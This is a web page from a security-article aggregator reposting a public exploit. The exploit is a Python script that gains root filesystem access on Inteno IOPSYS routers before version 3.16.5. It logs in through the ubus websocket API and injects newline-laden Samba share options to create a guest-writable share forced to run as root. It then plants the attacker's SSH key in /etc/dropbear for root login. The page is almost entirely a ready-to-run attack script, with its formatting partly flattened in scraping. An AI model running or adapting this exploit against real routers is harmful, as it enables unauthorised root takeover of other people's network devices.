HackDig : Dig high-quality web security articles

Inteno IOPSYS 3.16.4 Root Filesystem Access

2021-01-19 12:21
# Exploit Title: Inteno IOPSYS 3.16.4 - root filesystem access via sambashare (Authenticated)# Date: 2020-03-29# Exploit Author: Henrik Pedersen# Vendor Homepage: https://intenogroup.com/# Version: Iopsys <3.16.5# Fixed Version: Iopsys 3.16.5# Tested on: Kali Linux 2020.4 against an Inteno DG200 Router# Description:# It was possible to add newlines to nearly any of the samba share options when creating a new Samba share in Inteno’s Iopsys routers before 3.16.5. This made it possible to change the configurations in smb.conf, giving root access to the filesystem.# Patch in release# notes: https://dev.iopsys.eu/iopsys/iopsyswrt/blob/9d2366785d5a7d896359436149c2dbd3caec1a8e/releasenotes/release-notes-IOP-OS-version-3.16.x.txt# Exploit writeup: https://xistens.gitlab.io/xistens/exploits/iopsys-root-filesystem-access/#!/usr/bin/python3import jsonimport sysimport osimport timeimport argparsefrom websocket import create_connectionfrom impacket.smbconnection import SMBConnectionfrom impacket.examples.smbclient import MiniImpacketShell"""Root filesystem access via sambashare name configuration option in Inteno's Iopsys < 3.16.5Usage: smbexploit.py -u <username> -p <password> -k <path/to/id_rsa.pub> <host>Requires:impacketwebsocket-clientOn Windows:pyreadline"""def ubusAuth(host, username, password):    """    https://github.com/neonsea/inteno-exploits/blob/master/cve-2017-17867.py    """    ws = create_connection(f"ws://{host}", header = ["Sec-WebSocket-Protocol: ubus-json"])    req = json.dumps({        "jsonrpc": "2.0", "method": "call",        "params": [            "00000000000000000000000000000000","session","login",            {"username": username,"password": password}        ],        "id": 666    })    ws.send(req)    response =  json.loads(ws.recv())    ws.close()    try:        key = response.get('result')[1].get('ubus_rpc_session')    except IndexError:        return None    return keydef ubusCall(host, key, namespace, argument, params={}):    """    https://github.com/neonsea/inteno-exploits/blob/master/cve-2017-17867.py    """    ws = create_connection(f"ws://{host}", header = ["Sec-WebSocket-Protocol: ubus-json"])    req = json.dumps({"jsonrpc": "2.0", "method": "call",        "params": [key,namespace,argument,params],        "id": 666})    ws.send(req)    response =  json.loads(ws.recv())    ws.close()    try:        result = response.get('result')[1]    except IndexError:        if response.get('result')[0] == 0:            return True        return None    return resultdef auth(host, user, password):    print("Authenticating...")    key = ubusAuth(host, user, password)    if not key:        print("[-] Auth failed!")        sys.exit(1)    print(f"[+] Auth successful")    return keydef smb_put(args):    username = ""    password = ""    try:        smbClient = SMBConnection(args.host, args.host, sess_port=445)        smbClient.login(username, password, args.host)        print("Reading SSH key")        try:            with open(args.key_path, "r") as fd:                sshkey = fd.read()        except IOError:            print(f"[-] Error reading {args.sshkey}")                print("Creating temp file for authorized_keys")        try:            with open("authorized_keys", "w") as fd:                fd.write(sshkey)                path = os.path.realpath(fd.name)        except IOError:            print("[-] Error creating authorized_keys")        shell = MiniImpacketShell(smbClient)        shell.onecmd("use pwned")        shell.onecmd("cd /etc/dropbear")        shell.onecmd(f"put {fd.name}")         print("Cleaning up...")        os.remove(path)    except Exception as e:        print("[-] Error connecting to SMB share:")        print(str(e))        sys.exit(1)def main(args):    payload = "pwned]npath=/nguest ok=yesnbrowseable=yesncreate mask=0755nwriteable=yesnforce user=rootn[abc"    key = auth(args.host, args.user, args.passwd)    print("Adding Samba share...")    smbcheck = json.dumps(ubusCall(args.host, key, "uci", "get", {"config":"samba"}))    if "pwned" in smbcheck:        print("[*] Samba share seems to already exist, skipping")    else:        smba = ubusCall(args.host, key, "uci", "add", {                "config": "samba",                 "type":"sambashare",                 "values": {                    "name": payload,                     "read_only": "no",                     "create_mask":"0775",                     "dir_mask":"0775",                    "path": "/mnt/",                     "guest_ok": "yes"                    }            })        if not smba:            print("[-] Adding Samba share failed!")            sys.exit(1)    print("Enabling Samba...")    smbe = ubusCall(args.host, key, "uci", "set",        {"config":"samba", "type":"samba", "values":        {"interface":"lan"}})    if not smbe:        print("[-] Enabling Samba failed!")        sys.exit(1)    print("Committing changes...")    smbc = ubusCall(args.host, key, "uci", "commit",        {"config":"samba"})    if not smbc:        print("[-] Committing changes failed!")        sys.exit(1)        if args.key_path:        # Allow the service to start        time.sleep(2)        smb_put(args)        print(f"[+] Exploit complete. Try "ssh -i id_rsa root@{args.host}"")    else:        print("[+] Exploit complete, SMB share added.")def parse_args(args):    """ Create the arguments """    parser = argparse.ArgumentParser()    parser.add_argument("-u", dest="user", help="Username", default="user")    parser.add_argument("-p", dest="passwd", help="Password", default="user")    parser.add_argument("-k", dest="key_path", help="Public ssh key path")    parser.add_argument(dest="host", help="Target host")    if len(sys.argv) < 2:        parser.print_help()        sys.exit(1)    return parser.parse_args(args)if __name__ == "__main__":    main(parse_args(sys.argv[1:]))            

Source: 0410101202-BLW/eussi/moc.ytirucesxc

Read:317 | Comments:0 | Tags:No Tag

“Inteno IOPSYS 3.16.4 Root Filesystem Access”0 Comments

Submit A Comment



Blog :

Verification Code: